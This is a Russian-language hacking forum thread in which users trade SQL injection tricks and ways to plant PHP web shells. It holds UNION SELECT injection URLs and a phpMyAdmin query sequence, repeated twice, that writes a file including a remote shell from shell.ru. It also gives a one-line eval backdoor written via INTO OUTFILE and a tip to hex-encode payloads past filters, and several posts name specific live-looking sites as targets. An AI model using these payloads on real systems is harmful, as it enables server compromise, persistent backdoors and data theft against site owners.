2 jokester
Нет, там точно не на запятую ибо из информэйшн схема тэиблс все норм перебиралось лимитом, а вот из других табл уже облом
Линк кинул в пм
попробуй в запрос дописать +where+1=1, т.е. он будет примерно таким : www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+where+1=1+l imit+1,1/*
Народ прошу помощи.
Вобщем есть рут доступ к PhpMyAdmin
Мне нужно залить шел, но проблема в том что там инклуды отключены
Я заливал с помощью такого запроса
CREATE TABLE `forshelll` (`shl` TEXT NOT NULL)
TYPE = MYISAM ;
INSERT INTO `forshelll` ( `shell` )
VALUES (
'<?php include("http://shell.ru/shell.php") ?>'
); SELECT `shell` FROM `forshelll` INTO OUTFILE 'patch/www/shell.php'; DROP TABLE `forshelll`
Народ прошу помощи.
Вобщем есть рут доступ к PhpMyAdmin
Мне нужно залить шел, но проблема в том что там инклуды отключены
Я заливал с помощью такого запроса
CREATE TABLE `forshelll` (`shl` TEXT NOT NULL)
TYPE = MYISAM ;
INSERT INTO `forshelll` ( `shell` )
VALUES (
'<?php include("http://shell.ru/shell.php") ?>'
); SELECT `shell` FROM `forshelll` INTO OUTFILE 'patch/www/shell.php'; DROP TABLE `forshelll`
Ворпос! как можно ище залить без инклуда?
SELECT '<?php if(isset($_REQUEST["id"])) eval($_REQUEST["id"]);?>' INTO OUTFILE '/blablabla/www/script.php';
Если пхпмайадмин будет ругаться, то переводи текст в кавычках в SQL HEX:
http://hack-shop.org.ru/tools-code-encode
И потом уже без кавычек подставляй в запрос.
А не подскажите что можно сделать с сайтом у которого идёт фильтрация против SQl инъекций... Движок: PHP-nuke
Модули:
/modules.php?name=WhatYourSpeed
/modules.php?name=Rules
/modules.php?name=Downloads Ссылка: _http://la2ice.ru/
Доброго времени суток!
сайт http://geograd.ru/
magic_quotes off
мускул 5-ой версии
http://geograd.ru/?geo=-1&idnew=-328%27+union+select+1,2,3,4,table_schema+from+info rmation_schema.tables/*%22
тут все базы,судя по ним на серве крутится много сайтиков(если не прав,поправьте)
подскажите,как можно залить шелл на серв в данном случае?